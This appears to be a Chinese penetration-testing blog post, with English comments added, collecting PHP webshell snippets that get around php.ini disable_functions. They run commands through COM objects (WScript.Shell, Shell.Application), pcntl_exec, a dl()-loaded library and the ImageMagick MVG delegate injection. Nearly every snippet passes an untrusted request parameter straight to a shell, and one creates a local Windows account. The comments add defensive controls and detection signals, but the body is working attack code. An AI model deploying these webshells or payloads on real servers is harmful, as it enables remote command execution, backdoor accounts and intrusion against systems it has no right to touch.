在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。

话不多说,直接贴代码:
```php
<?php
// Windows-only route: WScript.Shell is a COM object, so this needs the com_dotnet extension loaded.
// Defensive note: disable_functions never covers classes; `disable_classes = COM` (or simply not
// loading com_dotnet) is the control that closes this path. `new COM()` throws com_exception when
// the class cannot be created, so the `or die()` guard on the next line never actually fires.
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
// The untrusted `c` query parameter is concatenated unchanged into a `cmd.exe /c` command line.
// Detection signal: cmd.exe spawned as a child of the PHP / web-server worker process.
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");
// The child's stdout is exposed as a text stream; it is read to EOF and echoed back to the HTTP client.
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
<?php
```

```php
header("Content-Type: text/plain");

// Linux route: writes a throw-away bash script into /tmp and runs it through pcntl_exec(), which is
// a pcntl-extension function and therefore not caught by a disable_functions list that only names
// exec()/system()/shell_exec(). Defensive note: pcntl_exec and pcntl_fork belong in disable_functions
// too (or leave pcntl unloaded for the web SAPI); a noexec /tmp is a second, independent control.
$cmd="/tmp/exec";
@unlink($cmd);
// The untrusted `x` request parameter is placed verbatim into the script body, with its output redirected to /tmp/output.txt.
$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777); // world-writable + executable file created by the web-server user — a clear file-integrity signal
$cd="/tmp/output.txt";
// This read happens before the fork below, so it prints whatever an earlier run left in the file, not this run's output.
print_r(file_get_contents($cd));

switch (pcntl_fork()) {

case 0:

// Child process: replaces its image with the script; pcntl_exec() only returns (false) on failure.
$ret = pcntl_exec($cmd);

exit("case 0");

default:

// Parent process — and also the fork-failure case, since -1 is not 0.
echo "case 1";

break;

}
```

```php
<?php
// Windows-only: Shell.Application COM object (the die() text still says Wscript.Shell, a copy-paste leftover).
// Defensive note: disable_functions does not apply here; disable_classes / not loading com_dotnet does.
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
// ShellExecute launches `net user test test /add`, i.e. creates a local account. Detection signals:
// net.exe spawned by the web-server process and a local-account-creation event on the host.
$exec=$phpwsh->ShellExecute("net"," user test test /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user test test /add");
?>
```

```php
<?php
// Windows-only: Shell.Application again (die() text is a leftover from the WScript.Shell variant).
// Defensive note: same control as above — disable_classes / no com_dotnet extension.
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
// Open() with an absolute path launches cmd.exe as a detached process; nothing is captured or returned
// to the HTTP client. The `\w`, `\s`, `\c` sequences are not PHP escapes, so the path is passed as written.
$exec=$phpwsh->open("c:\windows\system32\cmd.exe");
?>
```

```php
<?php
// Windows-only: walks the Shell.Application namespace down to cmd.exe and calls InvokeVerb() with no
// verb, which runs the item's default action (open). Same control as the other COM snippets:
// disable_classes / not loading com_dotnet; disable_functions is irrelevant to this path.
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>
```

```php
<?php
// Variant of the previous snippet using InvokeVerbEx(); called without arguments it presumably also
// runs the item's default action — confirm against the Shell.Application reference. Control and
// detection points are identical to the other COM snippets.
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>
```

```php
<?php
// Same WScript.Shell route as the first snippet, with the untrusted command taken from a POST field.
$command=$_POST[a];
$wsh = new COM('WScript.shell'); // create the COM object
$exec = $wsh->exec('cmd.exe /c '.$command); // call the object's method to run the command
// Child stdout is read to EOF and echoed back (no terminating `;` needed before `?>`).
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput
?>
```

```php
<?php
// Loads a custom shared object at runtime. Defensive note: dl() is only honoured in the CLI/CGI
// SAPIs and is gated by the `enable_dl` ini directive (Off in php.ini-production); the library also
// has to be resolvable from extension_dir, which is why the original comment mentions ../../.
dl("dl.so"); // dl.so lives in extension_dir; if it is not there, reach it with ../../
// Presumably a function exported by dl.so — its implementation is not visible here; the argument
// suggests it runs the untrusted `a` parameter with output redirected to 1.txt. Confirm against the library.
confirm_dl_compiled("$_GET[a]>1.txt");
?>
```

```php
<?php
// Prints the server's disable_functions list, then sidesteps it entirely by going through the Imagick
// extension: vulnerable ImageMagick builds passed the `url()` argument of an MVG fill to a shell when
// invoking the https delegate. Defensive note: a patched ImageMagick plus a policy.xml that disables the
// MVG/URL/HTTPS coders closes this; a `.mvg` file appearing in the web root and a shell spawned by the
// PHP process are the detection signals.
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

// Command comes from argv[1] on the CLI and from the untrusted `cmd` query parameter over HTTP.
// The loose `== ''` check also matches null, so a missing parameter falls back to `id`.
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}

// MVG document; $command is interpolated inside the heredoc's url() string.
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

// readImage() is the call that triggers the delegate; the PNG is a by-product and both files are removed afterwards.
file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
```

```php
<?php
// In-memory variant of the previous Imagick snippet: the MVG document is fed to readImageBlob(), so no
// `.mvg` file is written to disk and that detection signal is absent. Same controls apply — patched
// ImageMagick and a policy.xml disabling the MVG/URL/HTTPS coders; watch for shells spawned by the PHP process.
$c=$_REQUEST['c'];
// Untrusted `c` is interpolated into the url() of the MVG fill inside the heredoc.
$e = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|$c")'
pop graphic-context
EOF;
$i = new Imagick();
$i->readImageBlob($e);
?>
```

12-28 00:13